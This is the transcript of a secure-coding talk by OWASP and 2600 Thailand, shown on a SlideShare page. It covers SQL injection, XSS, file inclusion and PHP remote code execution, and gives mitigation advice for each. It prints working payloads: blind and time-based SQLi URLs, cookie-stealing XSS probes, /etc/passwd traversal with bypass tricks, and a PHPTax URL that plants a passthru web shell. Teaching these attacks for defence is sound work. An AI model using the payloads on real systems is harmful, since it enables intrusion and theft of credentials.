• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Hack and Slash: Secure Coding

Hack and Slash: Secure Coding



OWASP and 2600 Thailand

OWASP and 2600 Thailand



Total Views
Views on SlideShare
Embed Views



0 Embeds 0

No embeds



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    Hack and Slash: Secure Coding Hack and Slash: Secure Coding Presentation Transcript

    • Hack and Slash : Secure CodingKrit KadnokPrathan Phongthiproek
    • The Most Common Vulnerabilities SQL Injection Cross Site Scripting (XSS) File Inclusion Remote Code Execution
    • SQL Injection SQL Injection Blind SQL Injection
    • SQL Injection (Cont.)If user enters ‘ UNION SELECT ALL user(), database() #
    • Blind SQL Injection Normal Blind - Where you get TRUE/FALSE responsesbased on output of SQL query. This is visible changein page. Totally Blind - No change in output for TRUE/FALSEcondition.
    • Normal BlindVulnerable URL:http://site/vulnerabilities/sqli_blind/?id=1TRUE Response:http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1FALSE Response:http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2Check Version:FALSE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4TRUE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
    • Totally BlindAs this type didnt have any TRUE/FALSE responses, we need to usetime-based injection. Use IF() for condition and BENCHMARK() fortime delay.Check Version:FALSE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 UNION SELECTIF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),nullTRUE Responsehttp://site/vulnerabilities/sqli_blind/?id=1 UNION SELECTIF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),nullTable name guessing:http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 fromusers limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null
    • Blind SQL Injection
    • Case StudyPHD Helpdesk 2.12 SQLi Vulnerability (login.php)
    • Case StudyPHD Helpdesk 2.12 SQLi VulnerabilitySubmit POST data to login.php Result
    • Mitigation/Prevention Use of Prepared Statements (Parameterized Queries) Use of Stored Procedures Escaping all User Supplied Input Least Privilege White List Input Validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
    • Cross Site Scripting (XSS) XSS Reflected XSS Stored
    • XSS Reflected <script>alert(document.cookie)</script>
    • XSS Stored <script>alert(document.cookie)</script>
    • Mitigation/Prevention Escape Before Inserting Untrusted Data into HTMLContext Positive or “whitelist” input validation is alsorecommended Use HTTPOnly cookie flag https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
    • File Inclusion Include PHP Shell (RFI) Directory Traversal (LFI) Read Code via PHP Stream Filters (PHP://filter) Remote Code Execution (LFI to RCE) Etc
    • File Inclusion (RFI)RFI not Work !!Allow_url_include is disable
    • File Inclusion (LFI)LFI Work !!
    • File Inclusion (PHP Stream)It’s Work !!Allow_url_include is disable
    • File Inclusion (PHP Stream)<?phpclass Configuration{public $host = "localhost";public $db = "cuppa";public $user = "root";public $password = “mYDb@dm1n;public $table_prefix = "cu_";public $administrator_template = "default";public $list_limit = 25;public $token = "OBqIPqlFWf3X";public $allowed_extensions = "*.bmp; *.csv; *.doc;*.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf;*.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";public $upload_default_path = "media/uploadsFiles";public $maximum_file_size = "5242880";public $secure_login = 0;public $secure_login_value = "";public $secure_login_redirect = "";}?>
    • File Inclusion (LFI to RCE)
    • File Inclusion (Bypass) Bad Code Bypass it !! Null Byte ?page=../../../../../../../../../../../etc/passwd%00 Path Truncation ?page=../../../../../../../../../../../etc/passwd............. Dot Truncation ?page =../../../../../../../../../../../etc/passwd…………….....
    • Case Study DevalCMS 1.4a (currentfile) LFI Vulnerability
    • Case Study DevalCMS 1.4a (currentfile) LFI Vulnerability
    • Mitigation/Prevention Whitelist
    • Remote Code Execution Dangerous Function exec system passthru shell_exec proc_open pcntl_exec popen eval assert escapeshellcmd preg_replace call_user_func call_user_func_array Etc
    • Remote Code Execution
    • Remote Code Execution
    • Remote Code Execution (Bypass) PHPTax Remote Code Executionhttp://localhost/phptax/index.php?newvalue=%3C?php%20passthru%28$_GET[cmd]%29;?%3E&field=rce.php
    • Remote Code Execution
    • Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
    • Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
    • Mitigation/Prevention Ensure that user input is properly validated Limit the use of dynamic inputs from users tovulnerable functions Build a whitelist for positive file names and code withregular expressions (e.g. Alphanumeric only) orarrays. Do not try to blacklist for evil PHP code
    • Bug Hunting !! Code Review Scan for potential vulnerable functions Traces back its parameter Free Tool !! >> http://sourceforge.net/projects/rips-scanner/
    • RIPS
    • Visit => http://www.owasp.org
    • References http://www.websec.ca/kb/sql_injection https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet https://www.owasp.org/index.php/PHP_File_Inclusion https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution http://www.exploit-db.com http://sourceforge.net/projects/rips-scanner
    • If someone is still in the room..THANK YOU